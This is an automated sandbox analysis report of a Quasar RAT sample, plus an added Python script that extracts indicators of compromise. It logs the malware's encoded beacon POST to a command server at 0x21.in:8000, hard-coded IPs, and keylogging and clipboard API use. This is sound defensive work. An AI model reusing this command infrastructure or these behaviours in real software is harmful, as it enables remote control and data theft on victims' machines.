Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_0041160C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00AA445A GetFileAttributesW,FindFirstFileW,FindClose,

Networking:

Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 8000
May check the online IP address of the machine
Source: C:\Users\user\AppData\Local\Temp\windef.exe | DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe | DNS query: name: ip-api.com
Source: global traffic | HTTP traffic detected: POST /_az/ HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: 0x21.in:8000 | Content-Length: 101 | Cache-Control: no-cache | Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32 | Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2
Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | TCP traffic: 192.168.2.4:49743 -> 50.17.5.224:8000
Source: global traffic | TCP traffic: 192.168.2.4:49745 -> 5.8.88.191:8080
Source: CVbJSUXraQ.exe, 00000007.00000002.943097496.0000000003320000.00000004.00000001.sdmp | String found in binary or memory: http://0x21.in:8000/_az/
Source: windef.exe | String found in binary or memory: http://api.ipify.org/
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | String found in binary or memory: http://api.ipify.org/3
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | String found in binary or memory: http://freegeoip.net/xml/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com/json
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com/json/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com40l
Source: windef.exe, 00000006.00000002.713962745.00000000033C3000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp | String found in binary or memory: https://dotbit.me/a/
Source: unknown | DNS traffic detected: queries for: 0x21.in
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C6B070 socket,connect,setsockopt,send,recv,shutdown,closesocket,HeapFree,
Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 | Host: ip-api.com | Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | TCP traffic detected without corresponding DNS query: 5.8.88.191 (reported 23 times)
Source: unknown | HTTP traffic detected: POST /_az/ HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: 0x21.in:8000 | Content-Length: 101 | Cache-Control: no-cache | Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32 | Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2
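Added example (not part of the sandbox report): a small IOC extractor for the Networking lines above, written against the fused form the text export produces (the column break after "Source: ..." and the breaks between HTTP headers are lost, and the POST body is only available as the "Data Raw" hex dump). It pulls out the contacted domains, the ip:port endpoints, the request URLs, the HTTP server ports that are not standard ones (the report flags 8000), the IPs contacted without a preceding DNS lookup, and it decodes the 101-byte /_az/ POST body and checks it against the declared Content-Length. The sample lines are copied from this report; the STANDARD_HTTP_PORTS table is this script's own assumption.

```python
import re
from dataclasses import dataclass, field

# Lines copied from the report's Networking section, as the text export renders them.
SAMPLE_LINES = [
    "Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 8000",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747",
    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\windef.exeDNS query: name: ip-api.com",
    "Source: global trafficHTTP traffic detected: POST /_az/ HTTP/1.1User-Agent: Mozilla/4.0 "
    "(compatible; MSIE 6.0b; Windows NT 5.1)Host: 0x21.in:8000Content-Length: 101"
    "Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa "
    "49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 "
    "f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e "
    "38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32 "
    "Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2",
    "Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 "
    "(Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive",
    "Source: global trafficTCP traffic: 192.168.2.4:49743 -> 50.17.5.224:8000",
    "Source: global trafficTCP traffic: 192.168.2.4:49745 -> 5.8.88.191:8080",
    "Source: unknownDNS traffic detected: queries for: 0x21.in",
    "Source: unknownTCP traffic detected without corresponding DNS query: 5.8.88.191",
]

STANDARD_HTTP_PORTS = {80, 443}  # assumption of this script; HTTP on any other port is flagged

# Header names are the cut points in the fused header blob (no separator survives).
HEADER_NAMES = r"(?:User-Agent|Host|Content-Length|Content-Type|Cache-Control|Connection)"
HTTP_RE = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01](.*)$")
HEADER_RE = re.compile(rf"({HEADER_NAMES}): (.*?)(?={HEADER_NAMES}: |$)")
BODY_RE = re.compile(r"Data Raw: (.*?)\s*Data Ascii: .*$")
PORT_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TCP_RE = re.compile(r"TCP traffic: (\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)")
NODNS_RE = re.compile(r"without corresponding DNS query: (\d+\.\d+\.\d+\.\d+)")
DNS_RE = re.compile(r"DNS (?:query: name|traffic detected: queries for): (\S+)")
IP_RE = re.compile(r"\d+\.\d+\.\d+\.\d+")


@dataclass
class HttpRequest:
    method: str
    uri: str
    headers: dict
    body: bytes

    def url(self) -> str:
        return f"http://{self.headers.get('Host', '')}{self.uri}"

    def content_length_matches(self) -> bool:
        declared = self.headers.get("Content-Length")
        return declared is not None and int(declared) == len(self.body)


@dataclass
class Iocs:
    domains: set = field(default_factory=set)
    endpoints: set = field(default_factory=set)          # "ip:port" from TCP lines
    urls: set = field(default_factory=set)
    user_agents: set = field(default_factory=set)
    nonstandard_http: set = field(default_factory=set)   # server ports carrying HTTP
    no_dns_ips: set = field(default_factory=set)         # hard-coded peers, no lookup first
    requests: list = field(default_factory=list)


def parse_http(method: str, uri: str, rest: str) -> HttpRequest:
    """Split the fused header blob and decode the 'Data Raw' hex dump into bytes."""
    body = b""
    if m := BODY_RE.search(rest):
        body = bytes.fromhex(m.group(1))
        rest = rest[: m.start()]
    headers = {h.group(1): h.group(2) for h in HEADER_RE.finditer(rest)}
    return HttpRequest(method, uri, headers, body)


def extract_iocs(lines) -> Iocs:
    iocs = Iocs()
    for line in lines:
        if m := HTTP_RE.search(line):
            req = parse_http(*m.groups())
            iocs.requests.append(req)
            iocs.urls.add(req.url())
            if ua := req.headers.get("User-Agent"):
                iocs.user_agents.add(ua)
            host, _, port = req.headers.get("Host", "").partition(":")
            if host and not IP_RE.fullmatch(host):
                iocs.domains.add(host)
            if port and int(port) not in STANDARD_HTTP_PORTS:
                iocs.nonstandard_http.add(int(port))
        elif m := PORT_RE.search(line):
            # Both directions are reported; the client side is an ephemeral port,
            # so a flow is flagged only when neither end is a standard HTTP port.
            src, dst = int(m.group(1)), int(m.group(2))
            if not {src, dst} & STANDARD_HTTP_PORTS:
                iocs.nonstandard_http.add(dst)
        elif m := TCP_RE.search(line):
            iocs.endpoints.add(f"{m.group(3)}:{m.group(4)}")
        elif m := NODNS_RE.search(line):
            iocs.no_dns_ips.add(m.group(1))
        elif m := DNS_RE.search(line):
            iocs.domains.add(m.group(1))
    return iocs


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_LINES)
    for name in ("domains", "endpoints", "urls", "nonstandard_http", "no_dns_ips"):
        print(f"{name}: {sorted(getattr(found, name))}")
    for req in found.requests:
        print(req.method, req.url(), f"{len(req.body)} body bytes")
```

The two URLs it reconstructs, http://0x21.in:8000/_az/ and http://ip-api.com/json/, are the same strings the report later finds in process memory, which is the cross-check worth doing before the hostnames go on a blocklist. The decoded /_az/ body is 101 bytes, matching the declared Content-Length; the script leaves it as opaque bytes and makes no attempt to decode it.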
Source: Yara match | File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match | File source: dropped/vnc.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00DB2344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C83CC0 IsIconic,GetLastActivePopup,OpenClipboard,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C83A94 GetWindowLongPtrA,SendNotifyMessageA,GetClipboardOwner,OpenClipboard,GetClipboardData,GlobalLock,lstrlenA,lstrlenA,HeapAlloc,lstrlenA,lstrlenA,HeapFree,GlobalUnlock,CloseClipboard,SendNotifyMessageA,SetWindowLongPtrA,DefWindowProcA,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00E3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00E3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00ACCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

E-Banking Fraud:

Yara detected Quasar RAT
Source: Yara match | File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match | File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
